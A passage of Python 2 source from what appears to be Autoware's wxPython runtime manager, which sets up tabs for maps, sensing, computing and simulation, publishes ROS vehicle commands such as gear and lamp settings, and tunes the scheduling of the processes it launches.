AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
import wx
import wx.lib.buttons
import wx.lib.agw.customtreectrl as CT
import gettext
import os
import re
import sys
import fcntl
import threading
import Queue
import time
import socket
import struct
import shlex
import signal
import subprocess
import psutil
import pty
import yaml
import datetime
import syslog
import rtmgr
import rospy
import std_msgs.msg
from std_msgs.msg import Bool
from decimal import Decimal
from runtime_manager.msg import ConfigRcnn
from runtime_manager.msg import ConfigCarDpm
from runtime_manager.msg import ConfigPedestrianDpm
from runtime_manager.msg import ConfigNdt
from runtime_manager.msg import ConfigNdtMapping
from runtime_manager.msg import ConfigNdtMappingOutput
from runtime_manager.msg import ConfigICP
from runtime_manager.msg import ConfigVoxelGridFilter
from runtime_manager.msg import ConfigRingFilter
from runtime_manager.msg import ConfigDistanceFilter
from runtime_manager.msg import ConfigRandomFilter
from runtime_manager.msg import ConfigWaypointFollower
from runtime_manager.msg import ConfigTwistFilter
from runtime_manager.msg import ConfigVelocitySet
from runtime_manager.msg import ConfigCarKf
from runtime_manager.msg import ConfigPedestrianKf
from runtime_manager.msg import ConfigLaneRule
from runtime_manager.msg import ConfigLaneSelect
from runtime_manager.msg import ConfigLaneStop
from runtime_manager.msg import ConfigCarFusion
from runtime_manager.msg import ConfigPedestrianFusion
from tablet_socket.msg import mode_cmd
from tablet_socket.msg import gear_cmd
from tablet_socket.msg import Waypoint
from tablet_socket.msg import route_cmd
from ndt_localizer.msg import ndt_stat
from geometry_msgs.msg import TwistStamped
from geometry_msgs.msg import Vector3
from runtime_manager.msg import accel_cmd
from runtime_manager.msg import steer_cmd
from runtime_manager.msg import brake_cmd
from runtime_manager.msg import indicator_cmd
from runtime_manager.msg import lamp_cmd
from runtime_manager.msg import traffic_light
from runtime_manager.msg import adjust_xy
SCHED_OTHER = 0
SCHED_FIFO = 1
SCHED_RR = 2
PROC_MANAGER_SOCK="/tmp/autoware_proc_manager"
class MyFrame(rtmgr.MyFrame):
def __init__(self, *args, **kwds):
rtmgr.MyFrame.__init__(self, *args, **kwds)
self.all_procs = []
self.all_cmd_dics = []
self.load_dic = self.load_yaml('param.yaml', def_ret={})
self.config_dic = {}
self.Bind(wx.EVT_CLOSE, self.OnClose)
self.params = []
self.all_tabs = []
self.all_th_infs = []
self.log_que = Queue.Queue()
self.log_que_stdout = Queue.Queue()
self.log_que_stderr = Queue.Queue()
self.log_que_show = Queue.Queue()
#
# ros
#
rospy.init_node('runime_manager', anonymous=True)
rospy.Subscriber('to_rtmgr', std_msgs.msg.String, self.RosCb)
self.pub = rospy.Publisher('from_rtmgr', std_msgs.msg.String, queue_size=10)
#
# for Quick Start tab
#
tab = self.tab_qs
self.all_tabs.append(tab)
self.qs_cmd = {}
self.all_cmd_dics.append(self.qs_cmd)
self.qs_dic = self.load_yaml('qs.yaml')
self.add_params(self.qs_dic.get('params', []))
self.setup_buttons(self.qs_dic.get('buttons', {}), self.qs_cmd)
for nm in [ 'map', 'sensing', 'localization', 'detection', 'mission_planning', 'motion_planning' ]:
for key in self.qs_dic.get('exec_time', {}).get(nm, {}).keys():
(topic, msg, attr) = ( key.split('.') + [ None, None, None ] )[:3]
msg = globals().get(msg)
msg = msg if msg else std_msgs.msg.Float32
attr = attr if attr else 'data'
rospy.Subscriber(topic, msg, self.exec_time_callback, callback_args=(key, attr))
#
# for Setup tab
#
tab = self.tab_setup
self.all_tabs.append(tab)
setup_cmd = {}
self.all_cmd_dics.append(setup_cmd)
dic = self.load_yaml('setup.yaml')
self.add_params(dic.get('params', []))
self.setup_buttons(dic.get('buttons', {}), setup_cmd)
#
# for Map tab
#
tab = self.tab_map
self.all_tabs.append(tab)
self.map_cmd = {}
self.all_cmd_dics.append(self.map_cmd)
self.map_dic = self.load_yaml('map.yaml')
self.add_params(self.map_dic.get('params', []))
self.setup_buttons(self.map_dic.get('buttons', {}), self.map_cmd)
self.tc_point_cloud = self.obj_to_varpanel_tc(self.button_point_cloud, 'path_pcd')
self.tc_area_list = self.obj_to_varpanel_tc(self.button_area_lists, 'path_area_list')
self.label_point_cloud_bar.Destroy()
self.label_point_cloud_bar = BarLabel(tab, ' Loading... ')
self.label_point_cloud_bar.Enable(False)
def hook1G(args):
for f in args.get('func')().split(','):
sz = os.path.getsize(f)
if sz > 1024*1024*1024:
wx.MessageBox("Over 1GB\n\n{}\n({:,})".format(f, sz), caption='Warning')
args = { 'func':self.tc_point_cloud.GetValue }
hook_var = { 'hook':hook1G, 'args':args, 'flags':['every_time'] }
obj = self.button_point_cloud
gdic_v = self.obj_to_gdic(obj, {}).get('path_pcd', {})
gdic_v['hook_var'] = hook_var
#
# for Sensing tab
#
tab = self.tab_sensing
self.all_tabs.append(tab)
self.drv_probe_cmd = {}
self.sensing_cmd = {}
self.all_cmd_dics.append(self.sensing_cmd)
dic = self.load_yaml('sensing.yaml')
self.add_params(dic.get('params', []))
self.create_checkboxes(dic, self.panel_sensing, None, self.drv_probe_cmd, self.sensing_cmd, self.OnSensingDriver)
self.setup_buttons(dic.get('buttons', {}), self.sensing_cmd)
#self.timer = wx.Timer(self)
#self.Bind(wx.EVT_TIMER, self.OnProbe, self.timer)
#self.probe_interval = 10*1000
#if self.checkbox_auto_probe.GetValue():
# self.OnProbe(None)
# self.timer.Start(self.probe_interval)
self.dlg_rosbag_record = MyDialogRosbagRecord(self, cmd_dic=self.sensing_cmd)
buttons_color_hdr_setup(self.dlg_rosbag_record)
sense_cmds_dic = dic.get('cmds', {})
#
# for Computing tab
#
tab = self.tab_computing
self.all_tabs.append(tab)
parent = self.tree_ctrl_0.GetParent()
for i in range(2):
self.obj_get('tree_ctrl_' + str(i)).Destroy()
items = self.load_yaml('computing.yaml')
self.add_params(items.get('params', []))
self.sys_gdic = items.get('sys_gui')
self.sys_gdic['update_func'] = self.update_func
self.computing_cmd = {}
self.all_cmd_dics.append(self.computing_cmd)
for i in range(2):
tree_ctrl = self.create_tree(parent, items['subs'][i], None, None, self.computing_cmd)
tree_ctrl.ExpandAll()
tree_ctrl.SetBackgroundColour(wx.NullColour)
setattr(self, 'tree_ctrl_' + str(i), tree_ctrl)
self.Bind(CT.EVT_TREE_ITEM_CHECKED, self.OnTreeChecked)
self.setup_buttons(items.get('buttons', {}), self.computing_cmd)
#
# for Sensing tab (cmds)
#
parent = self.tree_ctrl_sense.GetParent()
self.tree_ctrl_sense.Destroy()
tree_ctrl = self.create_tree(parent, sense_cmds_dic, None, None, self.sensing_cmd)
tree_ctrl.ExpandAll()
tree_ctrl.SetBackgroundColour(wx.NullColour)
self.tree_ctrl_sense = tree_ctrl
#
# for Interface tab
#
tab = self.tab_interface
self.all_tabs.append(tab)
self.interface_cmd = {}
self.all_cmd_dics.append(self.interface_cmd)
self.interface_dic = self.load_yaml('interface.yaml')
self.add_params(self.interface_dic.get('params', []))
self.setup_buttons(self.interface_dic.get('buttons', {}), self.interface_cmd)
self.setup_buttons(self.interface_dic.get('checkboxs', {}), self.interface_cmd)
szr = wx.BoxSizer(wx.VERTICAL)
for cc in self.interface_dic.get('control_check', []):
pdic = {}
prm = self.get_param(cc.get('param'))
for var in prm['vars']:
pdic[ var['name'] ] = var['v']
gdic = self.gdic_get_1st(cc)
panel = ParamPanel(self.panel_interface_cc, frame=self, pdic=pdic, gdic=gdic, prm=prm)
szr.Add(panel, 0, wx.EXPAND)
self.panel_interface_cc.SetSizer(szr)
#
# for Database tab
#
tab = self.tab_database
self.all_tabs.append(tab)
self.data_cmd = {}
self.all_cmd_dics.append(self.data_cmd)
dic = self.load_yaml('data.yaml')
self.add_params(dic.get('params', []))
parent = self.tree_ctrl_data.GetParent()
self.tree_ctrl_data.Destroy()
tree_ctrl = self.create_tree(parent, dic, None, None, self.data_cmd)
tree_ctrl.ExpandAll()
tree_ctrl.SetBackgroundColour(wx.NullColour)
self.tree_ctrl_data = tree_ctrl
#self.setup_config_param_pdic()
if 'buttons' in dic:
self.setup_buttons(dic['buttons'], self.data_cmd)
#
# for Simulation Tab
#
tab = self.tab_simulation
self.all_tabs.append(tab)
self.simulation_cmd = {}
self.all_cmd_dics.append(self.simulation_cmd)
dic = self.load_yaml('simulation.yaml')
self.add_params(dic.get('params', []))
self.setup_buttons(dic.get('buttons'), self.simulation_cmd)
btn = self.button_play_rosbag_play
# setup for rosbag info
gdic = self.obj_to_gdic(btn, {})
gdic_v = dic_getset(gdic, 'file', {})
gdic_v['update_hook'] = self.rosbag_info_hook
tc = self.obj_to_varpanel_tc(btn, 'file')
if tc:
self.rosbag_info_hook( tc.GetValue() )
#vp = self.obj_to_varpanel(btn, 'sim_time')
#self.checkbox_sim_time = vp.obj
#try:
# cmd = ['rosparam', 'get', '/use_sim_time']
# if subprocess.check_output(cmd, stderr=open(os.devnull, 'wb')).strip() == 'true':
# self.checkbox_sim_time.SetValue(True)
#except subprocess.CalledProcessError:
# pass
self.label_rosbag_play_bar.Destroy()
self.label_rosbag_play_bar = BarLabel(tab, ' Playing... ')
self.label_rosbag_play_bar.Enable(False)
#
# for Status tab
#
tab = self.tab_status
self.all_tabs.append(tab)
self.status_cmd = {}
self.all_cmd_dics.append(self.status_cmd)
self.status_dic = self.load_yaml('status.yaml')
self.add_params(self.status_dic.get('params', []))
self.setup_buttons(self.status_dic.get('buttons', {}), self.status_cmd)
font = wx.Font(10, wx.FONTFAMILY_MODERN, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL)
self.label_top_cmd.SetFont(font)
#
# for Topics tab
#
tab = self.tab_topics
self.all_tabs.append(tab)
#
# for All
#
self.bitmap_logo.Destroy()
bm = scaled_bitmap(wx.Bitmap(rtmgr_src_dir() + 'autoware_logo_1.png'), 0.2)
self.bitmap_logo = wx.StaticBitmap(self, wx.ID_ANY, bm)
rtmgr.MyFrame.__do_layout(self)
cond = lambda s : s.startswith('tab_')
self.tab_names = [ self.name_get_cond(tab, cond=cond, def_ret='').replace('tab_', '', 1) for tab in self.all_tabs ]
new_btn_grps = ( lambda btn_names, tab_names=self.tab_names :
[ [ self.obj_get('button_{}_{}'.format(bn, tn)) for tn in tab_names ] for bn in btn_names ] )
self.alias_grps = new_btn_grps( ('rosbag', 'rviz', 'rqt') )
self.alias_grps += new_btn_grps( ('android_tablet', 'oculus_rift', 'vehicle_gateway', 'auto_pilot'),
('qs', 'interface') )
for grp in self.alias_grps:
wx.CallAfter(self.alias_sync, get_top(grp))
s = get_tooltip_obj(grp[0])
if s:
for obj in grp[1:]:
set_tooltip_str(obj, s)
# Topics tab (need, after layout for sizer)
self.topics_dic = self.load_yaml('topics.yaml')
self.topics_list = []
self.topics_echo_curr_topic = None
self.topics_echo_proc = None
self.topics_echo_thinf = None
self.topics_echo_que = Queue.Queue()
self.topics_echo_sum = 0
thinf = th_start(self.topics_echo_show_th)
self.all_th_infs.append(thinf)
self.refresh_topics_list()
# waypoint
self.route_cmd_waypoint = [ Waypoint(0,0), Waypoint(0,0) ]
rospy.Subscriber('route_cmd', route_cmd, self.route_cmd_callback)
# topic /xxx_stat
self.stat_dic = {}
for k in [ 'gnss', 'pmap', 'vmap', 'lf' ]:
self.stat_dic[k] = False
name = k + '_stat'
rospy.Subscriber(name, std_msgs.msg.Bool, self.stat_callback, callback_args=k)
# top command thread setup
toprc = os.path.expanduser('~/.toprc')
backup = os.path.expanduser('~/.toprc-autoware-backup')
self.toprc_setup(toprc, backup)
cpu_ibls = [ InfoBarLabel(self, 'CPU'+str(i)) for i in range(psutil.NUM_CPUS) ]
sz = sizer_wrap(cpu_ibls, wx.HORIZONTAL, 1, wx.EXPAND, 0)
self.sizer_cpuinfo.Add(sz, 8, wx.ALL | wx.EXPAND, 4)
self.lb_top5 = []
for i in range(5):
lb = wx.StaticText(self, wx.ID_ANY, '')
change_font_point_by_rate(lb, 0.75)
self.lb_top5.append(lb)
line = wx.StaticLine(self, wx.ID_ANY)
ibl = InfoBarLabel(self, 'Memory', bar_orient=wx.HORIZONTAL)
szr = sizer_wrap(self.lb_top5 + [ line, ibl ], flag=wx.EXPAND | wx.FIXED_MINSIZE)
self.sizer_cpuinfo.Add(szr, 2, wx.ALL | wx.EXPAND, 4)
th_arg = { 'setting':self.status_dic.get('top_cmd_setting', {}),
'cpu_ibls':cpu_ibls, 'mem_ibl':ibl,
'toprc':toprc, 'backup':backup }
thinf = th_start(self.top_cmd_th, th_arg)
self.all_th_infs.append(thinf)
# ps command thread
#thinf = th_start(self.ps_cmd_th, { 'interval':5 })
#self.all_th_infs.append(thinf)
# logout thread
interval = self.status_dic.get('gui_update_interval_ms', 100) * 0.001
tc = self.text_ctrl_stdout
thinf = th_start(self.logout_th, { 'que':self.log_que_stdout, 'interval':interval, 'tc':tc } )
self.all_th_infs.append(thinf)
thinf = th_start(self.logout_th, { 'que':self.log_que_stderr, 'interval':interval, 'tc':tc } )
self.all_th_infs.append(thinf)
thinf = th_start(self.logout_th, { 'que':self.log_que, 'interval':interval, 'tc':tc } )
self.all_th_infs.append(thinf)
if interval > 0:
thinf = th_start(self.logshow_th, { 'que':self.log_que_show , 'interval':interval , 'tc':tc })
self.all_th_infs.append(thinf)
else:
self.checkbox_stdout.Enable(False)
tc.Enable(False)
# mkdir
paths = [ os.environ['HOME'] + '/.autoware/data/tf',
os.environ['HOME'] + '/.autoware/data/map/pointcloud_map',
os.environ['HOME'] + '/.autoware/data/map/vector_map' ]
for path in paths:
if not os.path.exists(path):
subprocess.call([ 'mkdir', '-p', path ])
# icon
bm = scaled_bitmap(wx.Bitmap(rtmgr_src_dir() + 'autoware_logo_2_white.png'), 0.5)
icon = wx.EmptyIcon()
icon.CopyFromBitmap(bm)
self.SetIcon(icon)
def __do_layout(self):
pass
def OnClose(self, event):
# kill_all
for proc in self.all_procs[:]: # copy
(_, obj) = self.proc_to_cmd_dic_obj(proc)
self.launch_kill(False, 'dmy', proc, obj=obj)
save_dic = {}
for (name, pdic) in self.load_dic.items():
if pdic and pdic != {}:
prm = self.cfg_dic( {'name':name, 'pdic':pdic} ).get('param', {})
no_saves = prm.get('no_save_vars', [])
pdic = pdic.copy()
for k in pdic.keys():
if k in no_saves:
del pdic[k]
save_dic[name] = pdic
if save_dic != {}:
dir = rtmgr_src_dir()
print('saving param.yaml')
f = open(dir + 'param.yaml', 'w')
s = yaml.dump(save_dic, default_flow_style=False)
#print 'save\n', s # for debug
f.write(s)
f.close()
shutdown_proc_manager()
shutdown_sh = self.get_autoware_dir() + '/ros/shutdown'
if os.path.exists(shutdown_sh):
os.system(shutdown_sh)
for thinf in self.all_th_infs:
th_end(thinf)
self.Destroy()
def RosCb(self, data):
print('recv topic msg : ' + data.data)
r = rospy.Rate(10)
rospy.is_shutdown()
r.sleep()
self.pub.publish(data.data)
r.sleep()
def setup_buttons(self, d, run_dic):
for (k,d2) in d.items():
pfs = [ 'button_', 'checkbox_' ]
obj = next( (self.obj_get(pf+k) for pf in pfs if self.obj_get(pf+k)), None)
if not obj:
s = 'button_' + k
obj = StrValObj(s, False)
setattr(self, s, obj)
if not d2 or type(d2) is not dict:
continue
if 'run' in d2:
run_dic[obj] = (d2['run'], None)
set_tooltip(obj, d2)
gdic = self.gdic_get_1st(d2)
if 'param' in d2:
pdic = self.load_dic_pdic_setup(k, d2)
prm = self.get_param(d2.get('param'))
for var in prm.get('vars'):
name = var.get('name')
if name not in pdic and 'v' in var:
pdic[name] = var.get('v')
for (name, v) in pdic.items():
restore = eval( gdic.get(name, {}).get('restore', 'lambda a : None') )
restore(v)
self.add_cfg_info(obj, obj, k, pdic, gdic, False, prm)
pnls = [ gdic.get(var.get('name'), {}).get('panel') for var in prm.get('vars') ]
for pnl in [ gdic.get('panel') ] + pnls:
if pnl:
self.set_param_panel(obj, eval_if_str(self, pnl))
else:
self.add_cfg_info(obj, obj, k, None, gdic, False, None)
def OnGear(self, event):
grp = { self.button_statchk_d : 1,
self.button_statchk_r : 2,
self.button_statchk_b : 3,
self.button_statchk_n : 4 }
self.radio_action(event, grp.keys())
v = grp.get(event.GetEventObject())
if v is not None:
pub = rospy.Publisher('gear_cmd', gear_cmd, queue_size=10)
pub.publish(gear_cmd(gear=v))
def OnLamp(self, event):
pub = rospy.Publisher('lamp_cmd', lamp_cmd, queue_size=10)
msg = lamp_cmd()
msg.l = self.button_statchk_lamp_l.GetValue()
msg.r = self.button_statchk_lamp_r.GetValue()
pub.publish(msg)
def OnIndi(self, event):
pub = rospy.Publisher('indicator_cmd', indicator_cmd, queue_size=10)
msg = indicator_cmd()
msg.l = self.button_statchk_indi_l.GetValue()
msg.r = self.button_statchk_indi_r.GetValue()
pub.publish(msg)
def OnAutoPilot(self, event):
obj = event.GetEventObject()
self.alias_sync(obj)
v = obj.GetValue()
pub = rospy.Publisher('mode_cmd', mode_cmd, queue_size=10)
pub.publish(mode_cmd(mode=v))
def radio_action(self, event, grp):
push = event.GetEventObject()
for b in grp:
v = b.GetValue()
act = None
act = True if b is push and not v else act
act = False if b is not push and v else act
if act is not None:
set_val(b, act)
def stat_label_off(self, obj):
qs_nms = [ 'map', 'sensing', 'localization', 'detection', 'mission_planning', 'motion_planning' ]
exec_time = self.qs_dic.get('exec_time', {})
gdic = self.obj_to_gdic(obj, {})
msg = std_msgs.msg.Bool(False)
for k in gdic.get('stat_topic', []):
# exec_time off
if next( (dic for dic in exec_time.values() if k in dic), None):
self.exec_time_callback(std_msgs.msg.Float32(0), (k, 'data'))
else:
self.stat_callback(msg, k)
# Quick Start tab, exec_time off
obj_nm = self.name_get(obj)
nm = next( (nm for nm in qs_nms if 'button_' + nm + '_qs' == obj_nm), None)
for key in exec_time.get(nm, {}):
self.exec_time_callback(std_msgs.msg.Float32(0), (key, 'data'))
def route_cmd_callback(self, data):
self.route_cmd_waypoint = data.point
def stat_callback(self, msg, k):
self.stat_dic[k] = msg.data
if k == 'pmap':
v = self.stat_dic.get(k)
wx.CallAfter(self.label_point_cloud.SetLabel, 'OK' if v else '')
if k in [ 'pmap', 'vmap' ]:
v = self.stat_dic.get('pmap') and self.stat_dic.get('vmap')
wx.CallAfter(self.label_map_qs.SetLabel, 'OK' if v else '')
def exec_time_callback(self, msg, (key, attr)):
msec = int(getattr(msg, attr, 0))
exec_time = self.qs_dic.get('exec_time', {})
(nm, dic) = next( ( (nm, dic) for (nm, dic) in exec_time.items() if key in dic), None)
dic[ key ] = msec
lb = self.obj_get('label_' + nm + '_qs')
if lb:
sum = reduce( lambda a,b:a+(b if b else 0), dic.values(), 0 )
wx.CallAfter(lb.SetLabel, str(sum)+' ms' if sum > 0 else '')
# update Status tab
lb = ''
for nm in [ 'map', 'sensing', 'localization', 'detection', 'mission_planning', 'motion_planning' ]:
dic = exec_time.get(nm, {})
sum = reduce( lambda a,b:a+(b if b else 0), dic.values(), 0 )
if sum > 0:
s = nm + ' : ' + str(sum) + ' ms'
lb += s + '\n'
wx.CallAfter(self.label_node_time.SetLabel, lb)
wx.CallAfter(self.label_node_time.GetParent().FitInside)
#
# Setup tab
#
def OnSetupLocalizer(self, event):
obj = self.button_setup_tf
(pdic, gdic, prm) = self.obj_to_pdic_gdic_prm(obj)
self.update_func(pdic, gdic, prm)
#
# Computing Tab
#
def OnTreeMotion(self, event):
tree = event.GetEventObject()
pt = event.GetPosition()
event.Skip()
(item, flags) = tree.HitTest(pt)
if flags & CT.TREE_HITTEST_ONITEMLABEL == 0:
return
text = item.GetData()
if not text:
return
x = item.GetX()
y = item.GetY()
w = item.GetWidth()
h = item.GetHeight()
(x, y) = tree.CalcScrolledPosition(x, y)
iw = tree.GetItemWindow(item)
w -= iw.GetSize()[0] if iw else 0
if not wx.Rect(x, y, w, h).Contains(pt):
return
(x, y) = tree.ClientToScreen((x, y))
self.tip_info = (tree, text, wx.Rect(x, y, w, h))
if getattr(self, 'tip_timer', None) is None:
self.tip_timer = wx.Timer(self)
self.Bind(wx.EVT_TIMER, self.OnTipTimer, self.tip_timer)
self.tip_timer.Start(200, oneShot=True)
def OnTipTimer(self, event):
if getattr(self, 'tip_info', None):
(tree, text, rect) = self.tip_info
(w, h) = self.GetSize()
wx.TipWindow(tree, text, maxLength=w, rectBound=rect)
def OnTreeChecked(self, event):
self.OnChecked_obj(event.GetItem())
def OnChecked_obj(self, obj):
self.OnLaunchKill_obj(obj)
def OnHyperlinked(self, event):
self.OnHyperlinked_obj(event.GetEventObject())
def OnHyperlinked_obj(self, obj):
(pdic, gdic, prm) = self.obj_to_pdic_gdic_prm(obj)
if pdic is None or prm is None:
return
dic_list_push(gdic, 'dialog_type', 'config')
klass_dlg = globals().get(gdic_dialog_name_get(gdic), MyDialogParam)
dlg = klass_dlg(self, pdic=pdic, gdic=gdic, prm=prm)
show_modal(dlg)
dic_list_pop(gdic, 'dialog_type')
def obj_to_add_args(self, obj, msg_box=True):
(pdic, gdic, prm) = self.obj_to_pdic_gdic_prm(obj)
if pdic is None or prm is None:
return None
if 'need_camera_info' in gdic.get('flags', []) and msg_box:
ids = self.camera_ids()
if ids:
var = self.get_var(prm, 'camera_id', {})
var['choices'] = ids
dic_list_push(gdic, 'dialog_type', 'sel_cam')
klass_dlg = globals().get(gdic_dialog_name_get(gdic), MyDialogParam)
dlg = klass_dlg(self, pdic=pdic, gdic=gdic, prm=prm)
dlg_ret = show_modal(dlg)
dic_list_pop(gdic, 'dialog_type')
if dlg_ret != 0:
return False
else:
pdic['camera_id'] = ''
if 'open_dialog' in gdic.get('flags', []) and msg_box:
dic_list_push(gdic, 'dialog_type', 'open')
klass_dlg = globals().get(gdic_dialog_name_get(gdic), MyDialogParam)
dlg = klass_dlg(self, pdic=pdic, gdic=gdic, prm=prm)
dlg_ret = show_modal(dlg)
dic_list_pop(gdic, 'dialog_type')
if dlg_ret != 0:
return False
self.update_func(pdic, gdic, prm)
s = ''
vars = []
for var in prm.get('vars'):
cmd_param = var.get('cmd_param')
if cmd_param:
vars.append(var)
for var in vars[:]: # copy
cmd_param = var.get('cmd_param')
if cmd_param.get('tail'):
vars.remove(var)
vars.append(var)
for var in vars[:]: # copy
name = var.get('name')
flags = gdic.get(name, {}).get('flags', [])
if 'hide' in flags or 'disable' in flags:
vars.remove(var)
for var in vars:
cmd_param = var.get('cmd_param')
name = var.get('name')
v = pdic.get(name)
if (v is None or v == '') and 'default' in cmd_param:
v = cmd_param.get('default')
if dic_eval_if_str(self, cmd_param, 'must') and (v is None or v == ''):
print 'cmd_param', name, 'is required'
if msg_box:
wx.MessageBox('cmd_param ' + name + ' is required')
return False
if dic_eval_if_str(self, cmd_param, 'only_enable') and not v:
continue
if dic_eval_if_str(self, cmd_param, 'only_disable') and v:
continue
name = cmd_param.get('var_name', name)
unpack = cmd_param.get('unpack')
if unpack is not None:
v = ' '.join( v.split(unpack) )
add = ''
dash = cmd_param.get('dash')
if dash is not None:
add += dash + name
delim = cmd_param.get('delim')
if delim is not None:
str_v = str(v)
if var.get('kind') is None:
str_v = adjust_num_str(str_v)
if var.get('kind') == 'path':
str_v = path_expand_cmd(str_v)
str_v = os.path.expandvars(os.path.expanduser(str_v))
relpath_from = var.get('relpath_from')
if relpath_from:
relpath_from = path_expand_cmd(relpath_from)
relpath_from = os.path.expandvars(os.path.expanduser(relpath_from))
str_v = os.path.relpath(str_v, relpath_from)
add += delim + str_v
if add != '':
s += add + ' '
return s.strip(' ').split(' ') if s != '' else None
def obj_to_pdic_gdic_prm(self, obj, sys=False):
info = self.config_dic.get(obj)
if info is None:
sys_prm = self.get_param('sys')
prm_chk = lambda prm : prm is sys_prm if sys else prm is not sys_prm
info = next( ( v for v in self.config_dic.values() if v.get('obj') is obj and prm_chk(v.get('param')) ), None)
if info is None:
return (None, None, None)
pdic = info.get('pdic')
prm = info.get('param')
gdic = info.get('gdic')
return (pdic, gdic, prm)
def obj_to_gdic(self, obj, def_ret=None):
(_, gdic, _) = self.obj_to_pdic_gdic_prm(obj) if obj else (None, None, None)
return gdic if gdic else def_ret
def cfg_obj_dic(self, arg_dic, sys=False, def_ret=(None,{})):
sys_prm = self.get_param('sys')
prm_chk = {
True : (lambda prm : prm is sys_prm),
False : (lambda prm : prm is not sys_prm),
None : (lambda prm : True) }.get(sys)
arg_dic_chk = lambda dic: all( [ dic.get(k) == v for (k,v) in arg_dic.items() ] )
return next( ( (cfg_obj, dic) for (cfg_obj, dic) in self.config_dic.items() \
if arg_dic_chk(dic) and prm_chk(dic.get('param')) ), def_ret)
def cfg_dic(self, arg_dic, sys=False, def_ret={}):
(_, dic) = self.cfg_obj_dic(arg_dic, sys=sys, def_ret=(None, def_ret))
return dic
def cfg_prm_to_obj(self, arg_dic, sys=False):
return self.cfg_dic(arg_dic, sys=sys).get('obj')
def name_to_pdic_gdic_prm(self, name, sys=False):
d = self.cfg_dic( {'name':name}, sys=sys )
return ( d.get('pdic'), d.get('gdic'), d.get('param') )
def update_func(self, pdic, gdic, prm):
pdic_empty = (pdic == {})
for var in prm.get('vars', []):
name = var.get('name')
gdic_v = gdic.get(name, {})
func = gdic_v.get('func')
if func is None and not pdic_empty:
continue
v = var.get('v')
if func is not None:
v = eval(func) if type(func) is str else func()
pdic[ name ] = v
hook = gdic_v.get('update_hook')
if hook:
hook(v)
hook_var = gdic_v.get('hook_var', {})
every_time = 'every_time' in hook_var.get('flags', [])
if var == gdic.get('update_func_arg_var') or every_time:
hook = hook_var.get('hook')
if hook:
hook(hook_var.get('args', {}))
if 'pub' in prm:
self.publish_param_topic(pdic, prm)
self.rosparam_set(pdic, prm)
self.update_depend_enable(pdic, gdic, prm)
d = self.cfg_dic( {'pdic':pdic, 'gdic':gdic, 'param':prm}, sys=True )
self.update_proc_cpu(d.get('obj'), d.get('pdic'), d.get('param'))
def update_proc_cpu(self, obj, pdic=None, prm=None):
if obj is None or not obj.GetValue():
return
(_, _, proc) = self.obj_to_cmd_dic_cmd_proc(obj)
if proc is None:
return
if pdic is None or prm is None:
(pdic, _, prm) = self.obj_to_pdic_gdic_prm(obj, sys=True)
cpu_chks = self.param_value_get(pdic, prm, 'cpu_chks')
cpu_chks = cpu_chks if cpu_chks else [ True for i in range(psutil.NUM_CPUS) ]
cpus = [ i for i in range(psutil.NUM_CPUS) if cpu_chks[i] ]
nice = self.param_value_get(pdic, prm, 'nice', 0)
d = { 'OTHER':SCHED_OTHER, 'FIFO':SCHED_FIFO, 'RR':SCHED_RR }
policy = SCHED_OTHER
priority = 0
if self.param_value_get(pdic, prm, 'real_time', False):
policy = d.get(self.param_value_get(pdic, prm, 'policy', 'FIFO'), SCHED_FIFO)
priority = self.param_value_get(pdic, prm, 'prio', 0)
procs = [ proc ] + proc.get_children(recursive=True)
for proc in procs:
print 'pid={}'.format(proc.pid)
if proc.get_nice() != nice:
print 'nice {} -> {}'.format(proc.get_nice(), nice)
if set_process_nice(proc, nice) is False:
print 'Err set_process_nice()'
if proc.get_cpu_affinity() != cpus:
print 'cpus {} -> {}'.format(proc.get_cpu_affinity(), cpus)
if set_process_cpu_affinity(proc, cpus) is False:
print 'Err set_process_cpu_affinity()'
policy_str = next( (k for (k,v) in d.items() if v == policy), '?')
print 'sched policy={} prio={}'.format(policy_str, priority)
if set_scheduling_policy(proc, policy, priority) is False:
print 'Err scheduling_policy()'
def param_value_get(self, pdic, prm, name, def_ret=None):
def_ret = self.param_default_value_get(prm, name, def_ret)
return pdic.get(name, def_ret) if pdic else def_ret
def param_default_value_get(self, prm, name, def_ret=None):
return next( (var.get('v') for var in prm.get('vars') if var.get('name') == name ), def_ret) \
if prm else def_ret
def update_depend_enable(self, pdic, gdic, prm):
for var in prm.get('vars', []):
name = var.get('name')
gdic_v = gdic.get(name, {})
depend = gdic_v.get('depend')
if depend is None:
continue
vp = gdic_v.get('var')
if vp is None:
continue
v = pdic.get(depend)
if v is None:
continue
depend_bool = eval( gdic_v.get('depend_bool', 'lambda v : bool(v)') )
v = depend_bool(v)
enables_set(vp, 'depend', v)
def publish_param_topic(self, pdic, prm):
pub = prm['pub']
klass_msg = globals()[ prm['msg'] ]
msg = klass_msg()
for (name, v) in pdic.items():
if prm.get('topic') == '/twist_cmd' and name == 'twist.angular.z':
v = -v
(obj, attr) = msg_path_to_obj_attr(msg, name)
if obj and attr in obj.__slots__:
type_str = obj._slot_types[ obj.__slots__.index(attr) ]
setattr(obj, attr, str_to_rosval(v, type_str, v))
if 'stamp' in prm.get('flags', []):
(obj, attr) = msg_path_to_obj_attr(msg, 'header.stamp')
setattr(obj, attr, rospy.get_rostime())
pub.publish(msg)
def rosparam_set(self, pdic, prm):
rosparams = None
for var in prm.get('vars', []):
name = var['name']
if 'rosparam' not in var or name not in pdic:
continue
rosparam = var['rosparam']
v = pdic.get(name)
v = str(v)
cvdic = { 'True':'true', 'False':'false' }
if v in cvdic:
v = cvdic.get(v)
if rosparams is None:
cmd = [ 'rosparam', 'list' ]
rosparams = subprocess.check_output(cmd).strip().split('\n')
nm = rosparam
